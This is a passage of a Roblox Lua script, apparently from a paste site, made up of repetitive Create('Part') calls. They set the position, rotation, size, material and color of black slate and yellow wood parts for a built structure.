- ["Rotation"] = Vector3.new(90.0744934, -1.28044736, 7.34269857),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(169.234772, 14.5889912, 172.46698, 0.991551638, -0.127771825, -0.0223461613, -0.0223293304, 0.00156652858, -0.999749124, 0.12777482, 0.99180162, -0.00129975774),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.40999985, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o180 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(164.811615, 16.0235939, 171.93335),
- ["Rotation"] = Vector3.new(-107.587616, -65.0307846, 164.442627),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(164.811615, 16.0235939, 171.93335, -0.406661958, -0.113216005, -0.906534731, -0.913540065, 0.0593224354, 0.402395785, 0.00822025072, 0.991796017, -0.127551764),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o181 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(164.331619, 20.6036148, 171.763382),
- ["Rotation"] = Vector3.new(92.919281, -44.1048775, 9.07151318),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(164.331619, 20.6036148, 171.763382, 0.709083855, -0.113215268, -0.695973933, -0.694406927, 0.0592979006, -0.717133045, 0.122460403, 0.991796851, -0.0365703478),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o182 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(163.522049, 21.2397041, 171.623367),
- ["Rotation"] = Vector3.new(89.9207001, -27.0978317, 7.3072319),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(163.522049, 21.2397041, 171.623367, 0.882998586, -0.113228008, -0.455511212, -0.45163551, 0.0593092144, -0.890227497, 0.127814963, 0.991794765, 0.00123215781),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o183 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(165.111633, 16.9335938, 171.93335),
- ["Rotation"] = Vector3.new(-121.868965, -76.5461121, 150.881332),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(165.111633, 16.9335938, 171.93335, -0.203252137, -0.113215417, -0.972557485, -0.978487372, 0.0593234263, 0.197585553, 0.0353257991, 0.991795957, -0.122837722),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o184 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(164.94162, 19.5836029, 171.883392),
- ["Rotation"] = Vector3.new(105.239235, -70.396431, 19.7233467),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(164.94162, 19.5836029, 171.883392, 0.315823764, -0.113226481, -0.942036569, -0.944294155, 0.0593096539, -0.32370916, 0.0925244763, 0.991795182, -0.0881878957),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o185 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(165.20163, 18.3236027, 171.973389),
- ["Rotation"] = Vector3.new(164.74498, -83.3587875, 78.2458267),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(165.20163, 18.3236027, 171.973389, 0.0235574227, -0.113215335, -0.993289828, -0.997772634, 0.0593353808, -0.030426763, 0.0623821244, 0.991795182, -0.111565605),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o186 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Wood,
- ["BrickColor"] = BrickColor.new("Cool yellow"),
- ["Position"] = Vector3.new(146.879745, 6.64999866, 189.151596),
- ["Rotation"] = Vector3.new(-179.999695, 7.38997459, -178.848724),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(146.879745, 6.64999866, 189.151596, -0.991493344, 0.019925246, 0.12862207, 0.0200928692, 0.999798119, 5.42471798e-006, -0.128595963, 0.00258979225, -0.991693437),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(2, 15.5199995, 2),
- ["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
- })
- o187 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(170.819855, 15.51933, 172.575027),
- ["Rotation"] = Vector3.new(77.1646423, 59.7107582, 14.679369),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(170.819855, 15.51933, 172.575027, 0.487902105, -0.12781097, 0.863490283, 0.870727539, 0.00154984952, -0.491761982, 0.0615143217, 0.991796613, 0.112044737),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o188 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Wood,
- ["BrickColor"] = BrickColor.new("Cool yellow"),
- ["Position"] = Vector3.new(159.170425, 13.8683252, 191.150055),
- ["Rotation"] = Vector3.new(-0.0891441852, -7.34360695, -0.143002227),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(159.170425, 13.8683252, 191.150055, 0.991794109, 0.00247538416, -0.127819479, -0.00229699747, 0.999995828, 0.00154309697, 0.127822772, -0.00123675261, 0.991796374),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(26.6099987, 1.40999997, 38.4399986),
- ["BottomSurface"] = Enum.SurfaceType.SmoothNoOutlines,
- ["TopSurface"] = Enum.SurfaceType.SmoothNoOutlines,
- ["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
- })
- o189 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(171.159866, 16.2093296, 172.645035),
- ["Rotation"] = Vector3.new(53.6159477, 77.7174911, 36.9310265),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(171.159866, 16.2093296, 172.645035, 0.170048088, -0.127819777, 0.977110565, 0.985224009, 0.00152565062, -0.171260476, 0.0203997437, 0.99179548, 0.126190558),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o190 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Wood,
- ["BrickColor"] = BrickColor.new("Cool yellow"),
- ["Position"] = Vector3.new(174.476212, 6.09717751, 172.520493),
- ["Rotation"] = Vector3.new(-162.78418, 7.55201483, 173.746384),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(174.476212, 6.09717751, 172.520493, -0.985427022, -0.107984938, 0.1314262, -0.0653824285, 0.953750134, 0.293404371, -0.157030985, 0.280535519, -0.946911037),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(2, 15.5199995, 2),
- ["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
- })
- o191 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Wood,
- ["BrickColor"] = BrickColor.new("Cool yellow"),
- ["Position"] = Vector3.new(173.022232, 18.4541664, 178.858383),
- ["Rotation"] = Vector3.new(132.126755, 4.84235573, -174.472),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(173.022232, 18.4541664, 178.858383, -0.991795301, 0.0959880948, 0.0844144747, 0.00230087596, 0.673683226, -0.739015043, -0.127805218, -0.732758939, -0.668378651),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(2, 13.7999992, 2),
- ["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
- })
- o192 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(173.441605, 17.7078953, 172.896011),
- ["Rotation"] = Vector3.new(-110.775352, -69.9617462, 158.104965),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(173.441605, 17.7078953, 172.896011, -0.317930788, -0.127775386, -0.939464033, -0.947292089, 0.00156444067, 0.320366383, -0.0394652411, 0.991801441, -0.121538065),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o193 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(173.43161, 15.2478962, 172.886017),
- ["Rotation"] = Vector3.new(110.723473, -70.0715027, 22.0154705),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(173.43161, 15.2478962, 172.886017, 0.315991431, -0.127768084, -0.94011873, -0.94782263, 0.00155254896, -0.318792969, 0.0421912074, 0.991801739, -0.120611101),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o194 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(173.251602, 16.4678936, 172.886017),
- ["Rotation"] = Vector3.new(-174.013504, -82.6176758, 96.0270004),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(173.251602, 16.4678936, 172.886017, -0.0134903323, -0.127772644, -0.991710842, -0.999908686, 0.00155921362, 0.0134000387, -0.000165877573, 0.991801262, -0.127782226),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o195 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(171.240646, 19.4323082, 172.640961),
- ["Rotation"] = Vector3.new(1.02954125, 82.6549301, 88.8902817),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(171.240646, 19.4323082, 172.640961, 0.00247595529, -0.127819464, 0.991794169, 0.999996006, 0.00154682342, -0.00229708059, -0.00124051934, 0.991795897, 0.127822816),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(5.46999979, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o196 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(174.584854, 19.4383526, 173.052017),
- ["Rotation"] = Vector3.new(98.0279617, -47.6023865, 10.9301214),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(174.584854, 19.4383526, 173.052017, 0.662039697, -0.127849743, -0.738483429, -0.744461238, 0.00152975437, -0.667663932, 0.0864902958, 0.99179256, -0.0941663682),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o197 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(174.011612, 18.4978924, 172.945999),
- ["Rotation"] = Vector3.new(-94.6894302, -31.8977146, 171.343033),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(174.011612, 18.4978924, 172.945999, -0.839320302, -0.127789065, -0.528404474, -0.532941401, 0.00155479903, 0.846150577, -0.107307188, 0.99180007, -0.0694090426),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o198 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(174.084839, 20.3383579, 173.002029),
- ["Rotation"] = Vector3.new(114.594635, -72.8459625, 25.6859779),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(174.084839, 20.3383579, 173.002029, 0.265796542, -0.127839133, -0.955515265, -0.963366807, 0.00151371583, -0.268183321, 0.03573066, 0.991793811, -0.122753531),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o199 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(174.084839, 21.478363, 173.042038),
- ["Rotation"] = Vector3.new(-117.033997, -74.1226807, 152.142853),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(174.084839, 21.478363, 173.042038, -0.241875365, -0.127834916, -0.961849689, -0.969853044, 0.00151225075, 0.24368678, -0.0296971314, 0.991794169, -0.124346823),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o200 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(175.54834, 14.6322489, 173.182983),
- ["Rotation"] = Vector3.new(89.9382553, -0.209301338, 7.34016085),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(175.54834, 14.6322489, 173.182983, 0.991797984, -0.12775892, -0.0036529894, -0.00348438276, 0.00153549213, -0.999992371, 0.127763748, 0.991802931, 0.00107766723),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(4.67999983, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o201 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(174.54483, 22.418375, 173.13208),
- ["Rotation"] = Vector3.new(-97.4693832, -44.9054489, 169.602798),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(174.54483, 22.418375, 173.13208, -0.696643233, -0.127822921, -0.705938935, -0.711916447, 0.00154113898, 0.7022627, -0.0886773393, 0.991795778, -0.0920728743),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o202 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(175.161652, 18.9778957, 173.095947),
- ["Rotation"] = Vector3.new(-91.4672394, -10.5695419, 172.529755),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(175.161652, 18.9778957, 173.095947, -0.974689484, -0.12780562, -0.183428794, -0.18514134, 0.00154792634, 0.982710481, -0.125311971, 0.991797924, -0.0251708552),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o203 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Wood,
- ["BrickColor"] = BrickColor.new("Cool yellow"),
- ["Position"] = Vector3.new(171.374603, 6.64999866, 192.328552),
- ["Rotation"] = Vector3.new(-180, 7.38996935, 180),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(171.374603, 6.64999866, 192.328552, -0.991693676, -7.4860985e-008, 0.128621981, -5.43096981e-008, 1.00000012, 1.29764164e-008, -0.12862201, 3.38608857e-008, -0.991693437),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(2, 15.5199995, 2),
- ["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
- })
- o204 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(175.024841, 22.7883644, 173.202072),
- ["Rotation"] = Vector3.new(-93.1688766, -22.6286793, 172.040237),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(175.024841, 22.7883644, 173.202072, -0.914125085, -0.127817348, -0.3847574, -0.388122618, 0.00154763507, 0.921606302, -0.11720182, 0.991796613, -0.0510235503),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o205 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(176.331696, 19.0778961, 173.27594),
- ["Rotation"] = Vector3.new(-90.0708694, 0.141834423, 172.656158),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(176.331696, 19.0778961, 173.27594, -0.991793871, -0.127823129, 0.00247547519, 0.00229707547, 0.00154307357, 0.999996185, -0.127826452, 0.991795778, -0.00123679161),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement